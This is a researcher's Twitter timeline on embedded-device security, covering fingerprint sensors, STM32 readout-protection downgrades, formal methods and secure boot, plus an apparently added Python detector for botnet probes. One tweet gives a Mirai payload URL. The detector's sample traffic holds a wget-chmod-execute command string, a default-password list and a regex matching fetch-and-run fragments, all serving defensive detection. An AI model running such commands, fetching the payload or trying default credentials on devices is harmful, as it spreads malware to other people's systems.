Jeremy Boone
@uffeux
Kitchener, ON
Embedded systems bug hunter @ NCC Group

1,872 Tweets
413 Following
612 Followers

Tweets

Jeremy Boone @uffeux · 24 h
Yeah. Sorry for confusion. If the electronics are exposed on the outside of the door, it may be possible to tamper with them after opening the plastics. But it'd be time consuming and you're better off just kicking it in or picking the lock.

Jeremy Boone @uffeux · 24 h
Yeah for a door lock the threat model is different than, say, a mobile device that has a fingerprint sensor. You don't "lose" your door lock.

Jeremy Boone @uffeux · Feb 4
Match-on-host is possibly slightly better, assuming the host can authenticate the STM32 to prove it is legitimate, and that the bus is encrypted+MAC'd. Still, any cryptographic identities or secrets may be extracted with an RDP downgrade.

Jeremy Boone @uffeux · Feb 4
STM32 is a bad choice for match-on-chip implementations. The RDP downgrade attacks make it possible to tamper with the enrolled fingerprint template, or replace the firmware with a variant that accepts all fingerprints.

Jeremy Boone @uffeux · Jan 29
It tried to use a default password in an HTTP basic auth header in order to issue a request that executed a shell command that downloaded and executed the above payload.

Jeremy Boone @uffeux · Jan 29
Stood up a webserver for literally 30 seconds to mess around with something and got pinged by a bot trying to download this Mirai payload: http://82.223.101.182/.t/80/arm7

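The two tweets above describe a probe with two observable traits: a factory default credential in an HTTP Basic auth header, and a request whose target carries a download-and-execute shell fragment. The following is an added example, not code from the tweets or from NCC Group, showing how a defender can flag both traits in captured HTTP requests. The request format, the endpoint name, the default-credential list and the payload host (a TEST-NET address standing in for the one quoted in the tweet) are all constructed for the example.

```python
"""Flag HTTP requests that look like the probe described above: a default
credential in a Basic auth header plus a download-and-execute shell fragment
in the request target.  Constructed example, not code from the tweets."""
import base64
import binascii
import re
from urllib.parse import unquote

# Illustrative default credential pairs (constructed list; a real deployment
# would load a curated one).
DEFAULT_CREDENTIALS = {
    ("admin", "admin"),
    ("admin", "1234"),
    ("admin", "password"),
    ("root", "root"),
}

# Shape of a download-and-execute one-liner: a fetch tool, its arguments, a
# command separator, then chmod / sh / a relative exec.  Plain "wget" in a
# search query does not match because the separator and follow-up are required.
DOWNLOAD_EXEC = re.compile(
    r"(?:wget|curl|tftp)\s+[^;|&]*(?:;|\|\||&&|\|)\s*(?:chmod|sh\b|\./)", re.I
)


def decode_basic_auth(header_value):
    """Return (user, password) from an 'Authorization' header value, or None
    when the scheme is not Basic or the token is malformed."""
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    user, sep, password = raw.partition(":")
    if not sep:
        return None  # RFC 7617 requires the colon separator
    return user, password


def parse_request(raw):
    """Split a raw HTTP request into (method, target, headers); header names
    are lower-cased and parsing stops at the blank line before any body."""
    lines = raw.strip("\r\n").split("\n")
    parts = lines[0].split()
    if len(parts) < 2:
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers


def analyse_request(raw):
    """Return the list of indicators found in one raw HTTP request."""
    _method, target, headers = parse_request(raw)
    findings = []
    creds = decode_basic_auth(headers.get("authorization", ""))
    if creds is not None and creds in DEFAULT_CREDENTIALS:
        findings.append(f"default credential {creds[0]}:{creds[1]}")
    if DOWNLOAD_EXEC.search(unquote(target)):
        findings.append("download-and-execute shell fragment in request target")
    return findings


# Constructed sample traffic: one benign request and one probe shaped like the
# one in the tweets.  198.51.100.7 is a TEST-NET placeholder for the payload host.
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.1\r\nHost: 192.0.2.10\r\nUser-Agent: curl/7.64\r\n\r\n",
    (
        "GET /cgi-bin/run.cgi?cmd=cd%20/tmp;wget%20http://198.51.100.7/.t/80/arm7;"
        "chmod%20777%20arm7;./arm7 HTTP/1.1\r\n"
        "Host: 192.0.2.10\r\n"
        "Authorization: Basic YWRtaW46YWRtaW4=\r\n\r\n"
    ),
]

if __name__ == "__main__":
    for index, request in enumerate(SAMPLE_REQUESTS):
        print(index, analyse_request(request) or "clean")
```

Both indicators are reported independently, so a request that only carries a default credential (a password-guessing sweep) or only the shell fragment (an unauthenticated command-injection probe) still surfaces; a block-on-first-match rule would lose one of the two.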
Jeremy Boone @uffeux · Jan 26
if you assume all regs are potentially malicious, wouldn't that produce a large number of FPs?

Jeremy Boone @uffeux · Jan 26
Hmmm... well, that's like comparing apples and oranges. SiFive has the advantage of having very little legacy complexity. I guess we can agree on that :)

Jeremy Boone @uffeux · Jan 26
I guess my point is: ioread(0x<reg>); <-- how can an FM tool know whether the data read from any reg is attacker controlled?

Jeremy Boone @uffeux · Jan 26
... and this only refers to input verification. There are other classes of bugs that many formal methods would struggle with. Ex: confused deputy problems require insight into the responsibilities of the deputy, which is something that may be encoded in hardware not software.

Jeremy Boone @uffeux · Jan 26
The problem is that an FM tool can't divine the purpose of 10k's of peripheral regs, and how those regs are used to xfer data between sw and hw IPs, and whether any of that data can be trusted. This is where humans must train the tools.

Jeremy Boone @uffeux · Jan 26
Also, I would be surprised if any large company did not already use SAST products that support custom modeling (Coverity, Klocwork, Fortify). I think there's room for both. Use SAST for low hanging fruit, use skilled ppl to find new classes of vulns, then automate their detection.

Jeremy Boone @uffeux · Jan 1
What do you mean: other examples of bugs related to USB control transfers, or different bootrom vuln classes? There are many examples of both.

Jeremy Boone @uffeux · Dec 26
Like most peripherals in an embedded system, the chipset vendor develops/signs the firmware. The OEM merely distributes the firmware update package. Many TPM vendors base their code on this reference implementation: github.com/microsoft/ms-t…

Jeremy Boone @uffeux · Dec 22
Too expensive to buy a car for research purposes. Therefore much of the security work is done by contract, e.g. consulting. There are lots of automotive security experts who own cars every day, but can't publish because it's paid work for a client.

Jeremy Boone @uffeux · Dec 22
I would argue that if BL2 is not authenticated then the device doesn't truly implement secure boot.

Jeremy Boone @uffeux · Dec 7
Nice. It's certainly non-trivial to interpose the bus. Any plans on releasing the tooling?

Jeremy Boone retweeted
Ella Dawson @brosandprose · Dec 6
Here's some of the best advice I got when I became a manager last year! It's simple, but considering most people receive no management training whatsoever these days, it's better than nothing. Thread!

Jeremy Boone @uffeux · Dec 6
Awesome vulnerability and research.

Jeremy Boone retweeted
Yaah 🦀 ☕ @yaahc_ · Nov 27
GNU project code of conducts be like pic.twitter.com/on4W3QzVxC